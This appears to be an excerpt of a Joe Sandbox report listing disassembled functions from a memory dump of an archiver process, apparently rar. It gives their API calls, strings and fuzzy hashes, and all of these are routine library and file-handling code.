Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
Instruction ID: 49d99b14135b91148155797f9edf1bf9b01b8922ce049bfd4eac86dcc7fac192
Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
Instruction Fuzzy Hash: 2441D969F0960191FB15AB1598005B5E7A2BF04BD0F9A8936DD7F4B7D4EE3CE40283A1

Function 00007FF7F7EEDC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7F7EEDC47
_set_statfp.LIBCMT ref: 00007FF7F7EEDC62
_set_statfp.LIBCMT ref: 00007FF7F7EEDC7E
_set_statfp.LIBCMT ref: 00007FF7F7EEDCBA

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
Instruction ID: 02c139ee6408927b3dd1a3f8de287ca936064d2453fef542f7eb0cbbdc82f2ac
Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
Instruction Fuzzy Hash: 5E11B63EE1860205F7547124E486375A3416F457E0F864E36E57F076D6CEACA4C241E3

Function 00007FF7F7E97514 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F7ECCD7C: MessageBeep.USER32(?,?,?,?,00007FF7F7E9CA56,?,?,?,00007FF7F7ECB9B7), ref: 00007FF7F7ECCD9E

wcschr.LIBVCRUNTIME ref: 00007FF7F7E97597
wcschr.LIBVCRUNTIME ref: 00007FF7F7E9768D

Strings

[%c]%ls, xrefs: 00007FF7F7E97743
(, xrefs: 00007FF7F7E97754

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: wcschr$BeepMessage
String ID: ($[%c]%ls
API String ID: 1408639281-228076469
Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
Instruction ID: fd3953218d46ba6445da18fa17ab4cd4c88029c85a8b367ea07431dbd7c71611
Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
Instruction Fuzzy Hash: CF81D427A0864186EB64EF05E4402BAA7B5FB88BC8F840036EE6F47795DF3CE556C750

Function 00007FF7F7EA6FE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EA7176
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EA7221

Strings

%c%c%c%c%c%c%c, xrefs: 00007FF7F7EA71E3
%c%c%c%c%c%c%c%c%c, xrefs: 00007FF7F7EA716F

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: swprintf
String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
API String ID: 233258989-622958660
Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
Instruction ID: 87888c35fbc0341920bdfa577b2e13d289839d1168c529468ce1a8100c05edb9
Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
Instruction Fuzzy Hash: 735158F3F3C2448AE3548F1CE881BA96790F364B94F945A39F95B93B84C63DDA458740

Function 00007FF7F7E96E84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

wcschr.LIBVCRUNTIME ref: 00007FF7F7E96EC8
wcschr.LIBVCRUNTIME ref: 00007FF7F7E96F16

Strings

MCAOmcao, xrefs: 00007FF7F7E96F0F
MCAOmcao, xrefs: 00007FF7F7E96EC1

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: wcschr
String ID: MCAOmcao$MCAOmcao
API String ID: 1497570035-1725859250
Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
Instruction ID: d3e368d2d8ab73e7b7875595318b79bc8b81f8c359dc8613cf9a5ea43ba93b98
Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
Instruction Fuzzy Hash: 72415B1BD0C58380EB61BF2155515B9E372AF14B84FD84033DA7F4A2D5EE2EA5A282B1

Function 00007FF7F7EA3528 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7F7EA359E
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EA35E6

Part of subcall function 00007FF7F7EA30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF7F7EA305D,?,?,?,?,?,?,?,?,00007FF7F7EB4126,?,?,?,?,00000800), ref: 00007FF7F7EA30F0
Part of subcall function 00007FF7F7EA30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7F7EB4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7F7EA3119

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EA3651

Strings

%u.%03u, xrefs: 00007FF7F7EA35A7, 00007FF7F7EA3630

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AttributesFileswprintf$CurrentProcess
String ID: %u.%03u
API String ID: 2814246642-1114938957
Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
Instruction ID: 2e541c2b362d59a793df72bd674775d0a954c8fa0fdf10061bc717bb29d98ee5
Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
Instruction Fuzzy Hash: 1F31342961868182FB14AB28E4112AAE760BB947B4FD01336E97F47BE1DE3DD507C350

Function 00007FF7F7EE7854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF7F7EE793A
WriteFile.KERNEL32 ref: 00007FF7F7EE796D
GetLastError.KERNEL32 ref: 00007FF7F7EE798F

Strings

U, xrefs: 00007FF7F7EE7918

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
Instruction ID: 665ce0308e97752d24a293142e9e0b7bff940a68f75e64cec60f2e15dff2d5d7
Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
Instruction Fuzzy Hash: 8B41E526B19A4182EB20AF25E8443B9B7A1FB88794F814032EE5E877C4DF3CD412C791

Function 00007FF7F7EDD7BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F7EDE7D0: __vcrt_getptd_noexit.LIBVCRUNTIME ref: 00007FF7F7EDE7D4

__DestructExceptionObject.LIBVCRUNTIME ref: 00007FF7F7EDD7E2
RaiseException.KERNEL32 ref: 00007FF7F7EDD80B
__DestructExceptionObject.LIBVCRUNTIME ref: 00007FF7F7EDD86C

Strings

csm, xrefs: 00007FF7F7EDD83F

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
String ID: csm
API String ID: 2280078643-1018135373
Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
Instruction ID: 57bf33a1c3faa3cb942a6ef4b338fa58bb8d69f7c24167f581313ecb82549f51
Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
Instruction Fuzzy Hash: 3E213E7E60864186E731EB15E08026EB761F784BA5F481236DEAE07BD5CF3CE442CB90

Function 00007FF7F7EB42CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EB430F
wcschr.LIBVCRUNTIME ref: 00007FF7F7EB432C
wcschr.LIBVCRUNTIME ref: 00007FF7F7EB433C

Strings

%c:\, xrefs: 00007FF7F7EB4302

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: wcschr$swprintf
String ID: %c:\
API String ID: 1303626722-3142399695
Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
Instruction ID: f75944171b2a990b26f9bf5791fb054738d3b4498d69bde55da9d277c0675f31
Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
Instruction Fuzzy Hash: C011A116A0878281EF107F19950106DA760AF46BD0B9C8632CF7F037E6DF3CE46B8290

Function 00007FF7F7ECB780 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF7F7ECB7C0
CreateSemaphoreW.KERNEL32 ref: 00007FF7F7ECB7D0
CreateEventW.KERNEL32 ref: 00007FF7F7ECB7E7

Strings

Thread pool initialization failed., xrefs: 00007FF7F7ECB803

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
Instruction ID: f11047a51a26f4b053220bc4de5021a93aae2eb7402b98590f1af973cbd56d83
Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
Instruction Fuzzy Hash: 42110636B1564182F700AF21E4003A973E2FBC4B58F88843ACA6E0B699CF7D9457C7A0

Function 00007FF7F7ED2984 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F7ED2B96
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7ED2BA7

Part of subcall function 00007FF7F7EDBA34: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7F7EDB313), ref: 00007FF7F7EDBAB1
Part of subcall function 00007FF7F7EDBA34: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7F7EDB313), ref: 00007FF7F7EDBAF0

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F7ED2BB2
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7ED2BC3

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
String ID:
API String ID: 904936192-0
Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
Instruction ID: da6cfab9aaba516301addc873f512de4db3b0b2355e213c19df57393032842f7
Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
Instruction Fuzzy Hash: 1251F46AA19A8181EB10DF25D4903ACB3A5FBC4B94F888232DE6E477D4DF7DD512C360

Function 00007FF7F7EA3818 Relevance: 6.1, APIs: 4, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF7F7E9F6FC,00000000,?,?,?,?,00007FF7F7EA097D), ref: 00007FF7F7EA38CD
CreateFileW.KERNEL32(?,?,?,?,?,00007FF7F7E9F6FC,00000000,?,?,?,?,00007FF7F7EA097D,?,?,00000000), ref: 00007FF7F7EA391F
SetFileTime.KERNEL32(?,?,?,?,?,00007FF7F7E9F6FC,00000000,?,?,?,?,00007FF7F7EA097D,?,?,00000000), ref: 00007FF7F7EA399B
CloseHandle.KERNEL32(?,?,?,?,?,00007FF7F7E9F6FC,00000000,?,?,?,?,00007FF7F7EA097D,?,?,00000000), ref: 00007FF7F7EA39A6

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
Instruction ID: 475d2a41752f2ce9f26fc779db92c7a37cf97158df98d5586a04ae676ea22c95
Opcode Fuzzy Hash: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
Instruction Fuzzy Hash: B441F62AB0C64142FB50AB15A4017BAE7A4BB917A4F904236EDAE077D8DF3CD50B8750

Function 00007FF7F7ED0244 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F7ED03D3
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7ED03E4
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F7ED03EF
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7ED0400

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
